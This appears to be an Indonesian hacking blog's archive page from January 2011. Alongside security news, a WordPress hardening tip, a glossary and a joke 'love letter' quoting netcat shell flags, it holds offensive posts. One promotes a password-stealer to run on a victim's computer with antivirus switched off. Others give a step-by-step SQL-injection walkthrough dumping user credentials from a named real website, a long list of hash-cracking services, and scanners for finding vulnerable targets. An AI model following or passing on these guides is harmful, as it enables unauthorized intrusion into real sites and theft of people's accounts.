Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Selasa, 25 Januari 2011

Waspadai Antivirus Palsu via Goo.gl di Twitter


Jakarta - Kepopuleran sebuah situs secara otomatis akan menarik minat para pelaku kejahatan cyber untuk membidiknya. Demikian juga halnya Twitter dan para penggunanya, tak luput dari sasaran penyebar malware dan virus.

Graham Cluley dari Sophos memaparkan, virus tersebut dikirim melalui penyingkat URL goo.gl. Pengguna digiring agar membuka tautan aplikasi antivirus palsu yang sejatinya adalah virus itu sendiri.

"Ribuan tweeps menemukan bahwa akun mereka memposting tautan berisi program jahat tanpa seizin mereka. Ini menandakan adanya serangan dari anti virus palsu tersebut," kata Cluley seperti dikutip detikINET dari PC World, Selasa (25/01/2011).

Disebutkan Cluley, serangan program jahat yang disampaikan melalui tautan menggunakan penyingkat URL bukanlah sesuatu hal yang baru. Layanan penyingkat URL seperti goo.gl dan bit.ly kerap dipakai pengguna Twitter karena bisa memangkas jumlah karakter tweet.

Ini menjadi ladang menarik bagi para pelaku kejahatan cyber untuk memanfaatkannya dalam menyebarkan malware atau virus. Terlebih lagi, dengan banyaknya jumlah pengguna Twitter, akan sangat menguntungkan bagi mereka untuk mendapatkan korban dalam jumlah banyak sekali bidik.
Always With US BeaCheater

Cegah Cookie Pada Wordpress


Cookie adalah serangkaian teks yang disimpan pada komputer Anda oleh situs web yang Anda kunjungi. Pada umumnya cookie menyimpan pengaturan atau preferensi Anda untuk suatu situs web tertentu, misalnya bahasa yang dipilih, atau lokasi (negara) Anda. Ketika Anda kembali ke situs web tersebut, Browser akan mengirimkan cookie yang bersesuaian kepada situs web yang bersangkutan. Dengan cara ini, situs dapat menampilkan informasi yang sesuai dengan pengaturan atau preferensi Anda.

Cookie dapat menyimpan berbagai jenis informasi, termasuk di antaranya informasi pribadi seperti nama, alamat rumah, alamat email, atau nomor telepon Anda. Akan tetapi informasi ini hanya akan disimpan jika Anda pernah memberikan informasi ini kepada situs tersebut. Situs web tidak dapat mengakses informasi yang tidak pernah Anda berikan kepada situs web tersebut, dan situs web juga tidak dapat mengakses berkas lainnya pada komputer Anda. Secara bawaan (default), aktivitas menyimpan dan mengirim cookie tidak pernah terlihat oleh pengguna

Cookie Hijacking adalah satu metoda yang digunakan para hacker untuk melakukan penetrasi dengan cara melakukan pencurian cookie. Berikut penjelasan tentang Cookie Hijacking yang saya ambil dari wikipedia.

During normal operation cookies are sent back and forth between a server (or a group of servers in the same domain) and the computer of the browsing user. Since cookies may contain sensitive information (user name, a token used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is the act of intercepting cookies by an unauthorized party.

Cookies can be stolen via packet sniffing in an attack called session hijacking. Traffic on a network can be intercepted and read by computers on the network other than its sender and its receiver (particularly on unencrypted public Wi-Fi networks). This traffic includes cookies sent on ordinary unencrypted http sessions. Where network traffic is not encrypted, malicious users can therefore read the communications of other users on the network, including their cookies, using programs called packet sniffers.

Mencegah Cookie Hijacking pada WordPress dapat dilakukan dengan cara yang sangat simple yaitu dengan cara mengenkrip cookie nya. Bagaimana cara mengenkrip cookie pada wordpress? Untuk melakukan nya buka file wp-config.php anda lalu cari beberapa baris ini pada file tersebut

define(’AUTH_KEY’, ‘put your unique phrase here’);
define(’SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(’LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(’NONCE_KEY’, ‘put your unique phrase here’);

Lalu buka link berikut ini http://api.wordpress.org/secret-key/1.1/ dan kopi isi dari file tersebut yang di generate secara otomatis oleh wordpress, kemudian ganti 4 baris diatas dengan apa yang sudah kita kopi tadi, kemudian save file tersebut.

Dan Gotcha…!!!

WordPress yang anda miliki telah aman dari Cookie Hijacking. Simple sekali bukan? Trik ini dapat digunakan untuk WordPress versi 2.6.0 atau versi yang lebih tinggi.

Referensi : http://en.wikipedia.org/wiki/HTTP_cookie
Always With US BeaCheater

Goolag Scanner


Sebuah grup hacker yang menamakan diri ‘Cult of the Dead Cow’, merilis sebuah tool gratis bernama Goolag. Goolag diklaim memudahkan para hacker melancarkan aksinya dengan memanfaatkan situs mesin cari populer yaitu Google.

Goolag merupakan sebuah hacker tools yang berguna untuk mencari kelemahan suatu website dengan memanfaatkan Google. Seperti kita ketahui sebelumnya bahwa mesin pencari Google sering dimanfaatkan para attacker untuk melancarkan aksinya seperti mencari kelemahan suatu website, mendapatkan username dan password, mencari direktori sensitif, mencari data-data penting suatu perusahaan sampai dengan pencurian kartu kredit pun dapat dilakukan hanya dengan memanfaatkan Google.

Sebenarnya scanner seperti Goolag ini telah banyak bermunculan sebelum Goolag muncul. Bahkan ada beberapa tools scanner yang memanfaatkan google ini merupakan buatan anak indonesia. Namun Goolag diprediksi akan lebih populer bila dibandingkan dengan scanner lain yang memanfaatkan google dikarenakan penciptanya merupakan sebuah group hacker legendaris yang cukup terkenal pada akhir tahun 90-an. Group ini juga pernah membuat sebuah hacker tools yang cukup populer yaitu BACK ORIFICE yang bisa dipergunakan untuk menembus komputer dengan sistem operasi Microsoft Windows.

Goolag merupakan sebuah software open source yang dapat dengan bebas di kembangkan dan didistribusikan. User interfce Goolag sangat sederhana, dan dapat dengan mudah di gunakan bahkan oleh seorang pemula dalam dunia sekuriti. Untuk dapat berjalan dengan baik Goolag membutuhkan .NET Framework Version 2.0. Software dapat anda dowload di sini.

Berikut saya berikan tampilan user interface dari Goolag
Dari beberapa scanner yang memanfaatkan google yang pernah saya gunakan, menurut saya Goolag adah yang terbaik… Pada versi diatas Goolag menyediakan 1418 Google Dork yang dapat digunakan para attacker melancarkan aksinya. Dork tersebut masih bisa kita tambah dan kurangi sendiri dengan menggunakan sebuah file yang berisi berbagai dork lain yang disimpan dalam sebuah file dengan format *.XML
Demikianlah informasi tentang Goolag yang dapat saya berikan, semoga bermanfaat bagi teman-teman.

note:
Untuk dapat menggunakannya matikan antivirus anda.

SUMBER

Always With US BeaCheater

Senin, 24 Januari 2011

[E-Book] SQL Injection Attacks And Defance

SQL Injection Attacks and Defense - Ebook
SQL injection represents one of the most dangerous and well-known, yet misunderstood, security vulnerabilities on the Internet, largely because
there is no central repository of information to turn to for help. This is the only book devoted exclusively to this long-established but recently
growing threat. It includes all the currently known information about these attacks and significant insight from its contributing team of SQL
injection experts.
# What is SQL injection?-Understand what it is and how it works
# Find, confirm, and automate SQL injection discovery
# Discover tips and tricks for finding SQL injection within the code
# Create exploits using SQL injection
# Design to avoid the dangers of these attacks

Download
Always With US BeaCheater

Instilah-Instilah Pada Keamanan Komputer

1.Hacker

Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya, terutama keamanan.

2.White hat hacker

White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.

3.Black hat hacker

Black hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada para peretas yang menerobos keamanan sistem komputer tanpa izin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk mengacu kepada peretas dalam arti ini.

4.Cracker

Terjemahan bebas: Pembobol. Orang yang mampu menembus kode dan kode kunci (password) serta memecahkan sistem security tanpa izin atau secara tidak beretika. Istilah {cracker} telah ditemui oleh pengganggu sistem komputer untuk membedakan aktivititas penggunaan komputer yang melanggar aturan atau untuk memberikan istilah yang lebih berdasarkan aktivitasnya. Istilah ini juga membedakan {hacker} yang disebut sebagai seseorang yang mahir dalam menggunakan komputer beserta perintah-perintah dasarnya.

5.Script Kiddie

Sebuah pola serangan yang sering dilancarkan oleh hacker pemula dengan menggunakan alat bantu ringan yang bisa mereka dapatkan di banyak situs hacker lainnya. Alat bantu yang biasanya berisi sederetan skrip sederhana ini mereka gunakan untuk mendeface atau melancarkan DOS (Denial of Service) pada korban yang memiliki exploit. Hacker dengan jam terbang yang lebih tinggi biasanya mencibir hacker pemula yang menggunakan metode ini karena biasanya mereka menggunakan tanpa tahu teknologi dan konsep yang ada di balik pola serangan yang dilancarkan.

6.Elite

Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada. Salah satu suhu hacker di Indonesia yang saya hormati & kagumi kebetulan bekas murid saya sendiri di Teknik Elektro ITB, beliau relatif masih muda sekarang telah menjadi seorang penting di Telkomsel.

7.Vulnerability

Vulnerability atau celah keamanan adalah suatu kelemahan yang mengancam nilai integrity, confidentiality dan availability dari suatu asset. Vulnerability tidak hanya berupa software bugs atau kelemahan security jaringan. Namun kelemahan seperti pegawai yang tidak ditraining, dokumentasi yang tidak tersedia maupun prosedur yang tidak dijalankan dengan benar.

8. Security hole

Merupakan Celah dari keamanan system/ mesin Hal tersebut disebabkan karena adanya kelemahan-kelemahan di dalam:

- kebijaksanaan jaringan suatu perusahaan (Policy Vulnerabilities),

- konfigurasi suatu sistem (Configuration Vulnerabilities)

- teknologi yang digunakan (Technology Vulnerabilities).

Kelemahan-kelemahan itu biasanya dimanfaatkan untuk menyusup ke dalam suatu jaringan komputer tanpa diketahui pengelolanya. Beberapa masalah yang bisa timbul antara lain adalah:

- Packet Sniffing,

- Identity Spoofing,

- Data Theft,

- Data Alteration.

Selain hal tersebut di atas, masih banyak lagi masalah-masalah yang dapat timbul dari lemahnya sekuriti suatu jaringan. Ping-of-Death adalah salah satu cara untuk membuat suatu sistem menjadi crash, dengan mengirimkan ping dari suatu remote machine.

Untuk mengatasi hal-hal tersebut di atas, maka dibutuhkan solusi-solusi yang tepat dalam pengimplementasian teknologi jaringan. Jalur komunikasi yang akan dipakai harus benar-benar terjamin keamanan dan kehandalannya.
Diantara solusi untuk menyelesaikan permasalahan security ini adalah melalui:

1. Tunneling protocol,

2. IPSec,

3. Identification process.

9.Bug ( Kesalahan )

Istilah untuk suatu cacat/kesalahan pada software atau hardware yang membuatnya tidak dapat berfungsi sebagaimana mestinya. Proses untuk menemukan dan mengatasi bug disebut sebagai debugging.

Sistem software skala besar dan kompleks, pada prakteknya tidak mudah untuk mengantisipasi setiap gabungan potensial dari kejadian yang akan muncul dalam pemakaiannya. Terutama untuk pembuktian bebas dari kesalahan (bug).

Bug merupakan sebuah kenyataan dalam bidang Teknologi Informasi. Bug ini menjelaskan mengapa dalam daur hidup pengembangan sistem, biaya pengujian lebih mahal dari pada biaya pemrograman. Bug-bug tersebut juga memperlihatkan suatu tingkatan dimana risiko teknologi merupakan risiko bisnis juga.

10.Exploit

Exploit adalah sebuah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

Memang ada badan peneliti yang bekerja sama dengan produsen perangkat lunak. Peneliti itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan kalau mereka menemukannya, mereka melaporkan hasil temuan ke produsen agar produsen dapat mengambil tindakan. Meskipun demikian, exploit kadang menjadi bagian dari suatu malware yang bertugas menyerang kerapuhan keamanan.

* - Remote Exploite

remote exploit adalah program/eksploit yang jika dijalankan dari mesin kamu dengan sasaran server tertentu, akan mengakibatkan anda mendapatkan root shell di mesin/server sasaran yang berarti kamu mempunyai akses root dimesintsb

* - Local Exploite

Local exploit adalah program/eksploit yang jika dijalankan pada mesin atau target yang telah dijebol sebelumnya. dengan sasaran server itu sendiri, akan mengakibatkan anda mendapatkan root shell di mesin/server sasaran yang berarti kamu mempunyai akses root dimesin .

11. Logical Bomb

Merupakan Salah satu program jahat yang ditempelkan pada program komputer agar memeriksa suatu kumpulan kondisi di sistem. Ketika kondisi-kondisi yang dimaksud ditemui, logik mengeksekusi suatu fungsi yang menghasilkan aksi-aksi tak diotorisasi.

Logic bomb menempel pada suatu program resmi yang diset meledak ketika kondisi-kondisi tertentu dipenuhi. Contoh kondisi-kondisi untuk memicu logic bomb adalah ada atau tidak adanya file tertentu, hari tertentu dari minggu atau tanggal, atau pemakai menjalankan aplikasi tertentu. Begitu terpicu, bomb mengubah atau menghapus data atau seluruh file, menyebabkan mesin berhenti, atau mengerjakan perusakan lain.

12. Penetration Testing

Uji coba yang melakukan verifikasi dari mekanisme perlindungan yang dibuat oleh sistem, melindungi dari hal-hal yang mungkin terjadi.
Always With US BeaCheater

Minggu, 23 Januari 2011

Dituduh Hacking Ponsel Kepala Media PM Inggris Mundur


- Andy Coulson, Kepala Media Perdana Menteri (PM) Inggris David Cameron, mengundurkan diri setelah tim penyidik menanyainya terkait pembobolan telepon sejumlah orang ternama ketika ia menjabat sebagai editor di News of the World.

Dilansir Daily Mail, Jumat (21/1/2011), pengunduran ini diumumkan Coulson dan dibenarkan dari pihak kantor perdana menteri. "Kami memberitahukan jika Andy Coulson mengundurkan diri," demikian keterangan resmi yang disampaikan.

Coulson adalah orang penting dalam lingkaran Cameron setelah bergabung dengan tim kepemimpinan konservatif saat masih menjadi oposisi di tahun 2007.

Coulson mendapat tekanan yang kuat untuk mundur karena diduga ikut terlibat meng-hacking dan membobol sejumlah telepon pribadi orang-orang ternama saat itu dan membaca SMS serta mendengarkan pembicaraan pribadi mereka. Sejumlah nama ternama itu antara Sienna Miller, aktris asal Inggris termasuk yang mengajukan gugatan ke News of the World.

Tuduhan ini juga membuat mantan editor News of the World, Clive Goodman, dan juga tim penyidik swasta Glenn Mulcaire, ikut dibui.
Sumber
Always With US BeaCheater

Sabtu, 22 Januari 2011

Surat Cinta Hacker

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku >c:\ nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor "Remote Connect-Back Shell"jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu " The page cannot be found Coz Has Been Owned by Someone get out!" aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, ...?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain ...kamu.
Always With US BeaCheater

Jumat, 21 Januari 2011

XCode SQLI Vulnurable Scanner + Google Engine

Masih Ingat dengan Reiluke Exploit Scanner? saya yakin banyak yang sudah pernah menggunakannya karena sudah pernah penulis bahas di forum XCode - Yogyafree dan beberapa dari pembaca pasti bertanya "mengapa saat ini tool tersebut tidak bisa digunakan lagi atau tidak memunculkan hasil pencarian dari dork?". Kira kira ini mungkin bisa menjawab rasa penasaran rekan-rekan.

Setelah penulis bedah tool Reiluke Exploit Scanner, ternyata tool ini tidak mencari langsung dork yang kita isi ke google tapi melalui http://blackle.com/. Blackle adalah website yang menggunakan source Google untuk menampilkan hasil pencarian dan beberapa waktu yang lalu Blackle.com di-block oleh Google sehingga pencarian menjadi kosong. Dan setelah beberapa waktu kemudian, pemilik website tersebut menambahkan /cse?cx= ke source script web Blackle sehingga web menjadi normal kembali.

Lalu apa hubungannya dengan reiluke? Tool ini sepertinya tidak diupdate lagi oleh pembuatnya dan Reiluke masih memanfaatkan script lama Blackle yang saat ini sudah diubah oleh pihak Blackle sendiri. akibatnya Reiluke Exploit Scanner tidak bisa lagi menampilkan hasil Dorking. Yep.. gambaran sederhananya adalah misalnya Reiluke mengirimkan perintah ke blackle yang semula dari Http://www.google.com/search?= sedangkan saat ini Blackle sudah mengubah scriptnya menjadi http://www.google.com/cse?cx= .

Penulis mencoba membuat sebuah Tool XCode SQLI Vulnurable Scanner + Google Engine yang prinsip kerjanya hampir sama dengan Reiluke Exploit Scanner.Setelah download, ekstrak semua filenya dan jalankan XCodeSQLiScanner.exe, Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, arahkan mouse pada salah satu list di Google results dan Klik Inject With Parameter. Tool ini akan mengirimkan parameter injeksi ke SQL web seperti ' - *. Jika Web tersebut memiliki bug SQL Injection maka di status akan muncul : www.target.com?blabla.php?=1234 : SQLi Vulnurable.

Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.

Semoga Berguna

================================================== ==============
Credits:

Code name : .::XCode SQLI Vulnurable Scanner::.
Description : - SQLI Vulnurable Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni
System : Windows 95, 98, XP, Vista, 7
Size : 718 kb
Update : I`m not sure where will i put it. Just
check the sites below
http://www.xcode.or.id
http://ferdianelli.wordpress.com
================================================== ==============
XCode SQLI Vulnurable Scanner help you to gather the dorks
Link from Google. then you may check the results if its
Vulnurable to exploit with SQL commands
================================================== ===============

EOF
Always With US BeaCheater

Beberapa cara yang di pakai hacker handal

wokeh langsung aja ya buat kalian semua yang baca ini perhatikan baik² orang paling
ganteng sejagat raya indonesia ingin memberikan tulisan yang kalo dalam basaha sekarang nya / bahasa gaol nya itu tuuu...
sharing .......

di tulisan ini si kalo ga salah ya membahas tentang serangan2 ato ancaman dari hacker gitu deh

ok kita mulai

1.SERANGAN PADA PASSWORD
perlu diketahui bahwa jika kita login pa aja kta,harus menggunakan kunci atau password.maka kalau kunci yg kita buat tidak unik atau mudah dbuat,kunci it akan mudah dibo2l dan dtebak ataupun menggunakan metode BRUTE FORCE ATTACK,brutf force attack sesuai

dgn namanya menebak password dgn brutal.yaitu memakai b’bgai kmbinasi kemungkinan.

2.SOCIAL ENGINEERING
metode ini sebagai menyusup dengan sistem memanfaatkan faktor psikologis korban.contoh metode SOCIAL ENGINEERING,sering anda lhat dalam khdpan shari2 kalau ada sms atau telpon yg mengarah kepada hanphone kita dan sms atau telpon itu mengatakan bahwa kita mendapatkan hadiah tertentu.dan untk it anda harus mngeluarkan biaya yg sngat bsar yg bersifat confidential?jika anda mengalaminy,perlu dwaspdai krenas seorng sosial engineer sdang mencri mangsa.

3.MAN IN THE MIDDLE
misalnya seseorng sdang asyik berkomunikasi bertukar informasi melalui sebuah jalur.tidak disangka tiba2 seorang hacker mencegat pesan it lalu dibaca,memodifikasi dan mengirimkan kembali pesan yg sudah beruah tersebut kepda korban.serangan ini disebut man in the middle.

4.SNIFFING
hampir mirip dengan metode MAN IN THE MIDDLE,tapi bedanya hanya mengambil dan menganalisanya tida dimodifkasi.

5.WEB DEFACEMENT
yah,ini merupakan serangan yg umumnya tidak berbahaya.tetapi tetap dgolngkan sbgai perusak,cntoh:jika web defacement berhasil menyerang atau membobol website yg memiliki keamanan tinggi,tentunya akan mengurangi kepercyan pelanggan.
inilah posting kali ini yg saya berikan khusus untuk anda yg membuka blog saya.karena blog yg saya posting ini seharurnya sangat rhasia dkalangan hacker,tetapi saya akan membagi ilmu saya bagi yg setiap x membaca blog ini.pada posting laen x saya akan membahas tetang langkah2 hacking seperti yg dilakukan hacker pada umumnya,moga ilmu ini bermanfaat bagi anda semua,terima kasih.asslamualaiku wr.wb..

maap nii kalo ga berguna coz ak bukan hacker apalagi hacker handal .......

kalo sendal ia
Sumber
Always With US BeaCheater

Software Hacking FaceBook,Yahoo,Gmail

Hacking Facebook , Gmail , Yahoo , dkk Dengan Cara Mudah .. Tanpa Ribet .. Dan Ini Bukan KEYLOGGER atau ALat Perekam Lainya Yang Kalian Pikir . Kau Tidak Percayan .. Langsung Ajah Download SOftwarenya : DOWNLOAD Ingan Jangan Lupa Untuk Mematikan Dlu Anti Virus Kalian . Cara Penggunaannya : Cukup di klik icon stealer nya pada komputer calon korban. . Lalu muncul notepad. . . setelah itu. . . . ada daftar email dan password nya . . Ingat sebelum memakai nya. . Antivirus agan itu di off kan sementara. . software ini kebiasa'an kompatibel pada win XP sp2 . sumber : www.educations21.co.cc
Always With US BeaCheater

Kinect Di Hack Untuk Operasi Bedah

Jakarta - Sejak kemunculan Kinect, banyak orang berupaya mengakali perangkat game besutan Microsoft tersebut. Namun mengoprek Kinect ini ternyata tak selalu berujung negatif, upaya hacking Kinect terbaru justru bisa bermanfaat membantu para dokter dalam melakukan operasi bedah.
Ya, di University of Washington, Amerika Serikat (AS), sekelompok mahasiswa teknik 'menyulap'

Kinect seharga USD 150 menjadi alat medis untuk operasi pembedahan senilai USD 50 ribu. Seperti dilansir Pop Science dan dikutip detikINET, Rabu (19/01/2011), selama bertahun-tahun para ilmuwan dan ahli teknis bekerja menyempurnakan tingkat kepekaan sentuhan dalam operasi bedah yang dilakukan robot. Ini sangat diperlukan untuk memudahkan setiap tahapan operasi. Kinect, dalam hal ini mengilhami tim teknis di University of Washington yang dipimpin Fredrik Ryden mengembangkan software khusus yang memungkinkan sensor gerak pada Kinect dimanfaatkan untuk operasi. Tak hanya itu, Kinect juga dibuat agar bisa menampilkan peta tubuh pasien dalam bentuk tiga dimensi (3D). "Ini sangat baik untuk melakukan demonstrasi pembedahan karena menghemat biaya dan mudah diakses. Sangat mudah membuat sebuah prototype yang cepat karena Microsoft telah membangun semua di dalamnya," jelas Ryden . sumber : www.detikinet.com
Always With US BeaCheater

Kamis, 20 Januari 2011

SQL Injection With Reiluke SQLi Helper v27





ok langsung aja gan

skrg ane punya target sqli

TARGET --> http://www.dootalk.com/content/showarticle.php?ID=61


nah skrg buka tools reiluke'a
skipp..
ok dah kebuka reiluke'a
sekarang masukann target dan langsung ---> inject
kaya di bawah gan
sep target dah masuk
setelah di inject keliatan dah database'a ..hehehhe
yoi target versi 5 gan
hmm..
qlo versi 4 se coba ane pake tools ini kaga bisa gan

wokeehh lanjuutt
stelah inject , klik get tadabase
hmm get database guna'a buat'a nyari tabel database'a gan
yoi contohnya kaya di bawah gan

truss lanjutkann ..
oia yg berwarna biru itu database'a gan
abis itu langsung klik get tables gan
hmm
sebelum klik get tables tandain dulu database gan
ok kaya gini

weww
keliatan dah table name'a ..hehhehe
wokehh
di dalam tabel name itu ada tabel users
kerenn yahh nih toolss cuma klik2 bisa ngeliat langsung tabell user'a
lanjjuut gan
setelah dapat dapat tabel user'a skarang nyari kolom'a
hmmm
cari kolom'a sama aja si gan sama cari tabel gan
sepp klik tabel kolom'a skrg
kaya gini gan
weww
makin keren aja dah nih tools ..hahaha
bisa ngeliat user ID & password sekarang gan ..wkwkwkwk

wokeh trakhir tinggal dump buat nyari user id & password'a gan
langsunng aja gan
sep dah keliatan user ID & password'a
sekarang tinggal di hash dah password'a
ni koleksi hash gw gan , dipilih dipilih..hahahhhahahha
credit : md search
MD4, MD5, SHA1
Code
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/Cr*ck-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

MD5:
http://md5.sh4ka.fr
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can't read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in...roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=Cr*ck
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

MD4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

SHA1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index ... ducts_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
oia mau tools reiluke'a bisa di unduh/donlot di mari:
Download
password'a reiluke :
www.reiluke.i.ph
hmm..
inget jangan ke tagihan pake tools gan
ntr ga maju2 lagi qlo pake tools
Sumber
Always With US BeaCheater

Mencari Target With SQL Scanner

kali ini saya akan share tutorial tentang mencari target dengan google SQL injection scanner.

Banyak yang bertanya2 "om gimana sih cari target ? "om ajarin cari target sih ?
dan "om om... dst dsbb dll. Kemudian saya jawab. simple kok mas, tinggal buka google terus masukin dork nya, trs cari2 deh.

Oh, gitu ya om ? tp kemaren saya liat temen saya dapetnya cepet banget gmn ya om ? ajarin saya dong om ?
saya mau belajar SQL Injection nih dari tadi ga dapet korban yang vuln

Kemudian saya jawab lagi. "Baik kisanak, saya akan mengajarkan anda. karena anda mau berusaha. LEST GO!


